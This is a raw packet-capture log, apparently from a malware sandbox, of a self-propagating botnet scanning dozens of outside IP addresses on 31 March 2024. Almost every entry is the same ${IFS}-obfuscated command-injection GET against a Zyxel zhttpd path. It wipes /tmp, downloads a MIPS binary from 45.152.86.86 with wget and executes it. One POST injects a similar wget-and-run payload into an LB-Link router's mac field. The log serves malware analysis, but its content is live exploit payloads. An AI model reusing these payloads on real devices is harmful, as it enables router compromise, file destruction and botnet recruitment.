                                        Mar 31, 2024 09:23:00.006220102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9879192.168.2.2346692109.23.158.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006262064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9880192.168.2.233465825.77.203.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006311893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9881192.168.2.2349400209.60.138.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006340027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9882192.168.2.234643068.12.15.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006381989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9883192.168.2.2360046148.62.154.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006422997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9884192.168.2.2345530217.164.224.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006448030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9885192.168.2.235281249.55.239.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006496906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9886192.168.2.235308658.44.132.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006551981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9887192.168.2.236049261.231.105.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006602049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9888192.168.2.235708012.212.74.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006642103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9889192.168.2.235398691.221.164.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006700993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9890192.168.2.234255644.43.171.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006762028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9891192.168.2.233590857.115.102.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006808996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9892192.168.2.2342790167.16.56.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006845951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9893192.168.2.235372889.123.56.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006885052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9894192.168.2.236023237.54.161.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006932020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9895192.168.2.235959094.204.12.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006993055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9896192.168.2.235275689.97.109.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007025957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9897192.168.2.2337268185.218.242.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007061958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9898192.168.2.2338678186.93.23.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007101059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9899192.168.2.233455451.32.55.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007169008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9900192.168.2.2340046106.98.220.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007230043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9901192.168.2.2352972102.69.87.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007293940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9902192.168.2.2340792189.237.75.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007339954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9903192.168.2.235948276.186.108.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007385015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9904192.168.2.2356766188.206.217.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007424116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9905192.168.2.2337054152.68.157.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007447958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9906192.168.2.2335658196.142.60.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007519007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9907192.168.2.235786877.17.94.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.007579088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9908192.168.2.236063242.101.76.1498080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.342400074 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:23:00.668819904 CEST315INHTTP/1.1 400 Bad Request
                                        Server: openresty
                                        Date: Sun, 31 Mar 2024 07:23:00 GMT
                                        Content-Type: text/html
                                        Content-Length: 154
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9909192.168.2.2353718118.62.76.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997648001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9910192.168.2.2347002192.145.139.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997695923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9911192.168.2.235450818.184.220.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997736931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9912192.168.2.235792260.37.6.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997801065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9913192.168.2.2360702111.201.254.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997852087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9914192.168.2.2347124112.168.167.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997888088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9915192.168.2.2353298143.116.34.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997930050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9916192.168.2.2347732201.222.84.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.997977018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9917192.168.2.234515441.47.35.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998028040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9918192.168.2.2343472170.254.96.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998054028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9919192.168.2.235107257.52.203.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998095036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9920192.168.2.2338172181.98.2.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998187065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9921192.168.2.234349024.188.99.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998255014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9922192.168.2.234782665.229.233.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998298883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9923192.168.2.2346098187.67.204.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.998898029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9924192.168.2.235163291.112.72.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029213905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9925192.168.2.233397854.205.235.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029269934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9926192.168.2.234359282.112.248.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029326916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9927192.168.2.234334062.111.153.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029392004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9928192.168.2.235781063.39.250.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029443979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9929192.168.2.235458075.95.134.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029481888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9930192.168.2.2336976133.204.61.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029525042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9931192.168.2.2341562182.142.41.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029581070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9932192.168.2.234359231.197.34.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029632092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9933192.168.2.2357540115.51.122.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.029670954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9934192.168.2.2347048132.197.115.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.030046940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9935192.168.2.2353120140.7.187.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.030081034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9936192.168.2.235565082.188.168.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:02.030123949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9937192.168.2.2334600157.208.177.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:03.033195972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9938192.168.2.234354842.89.49.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:03.033232927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9939192.168.2.2354486201.206.109.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:03.033271074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9940192.168.2.2333750200.196.182.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:04.045449972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9941192.168.2.2338762100.181.148.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:04.045500040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9942192.168.2.2333210212.224.38.76443
                                        TimestampBytes transferredDirectionData
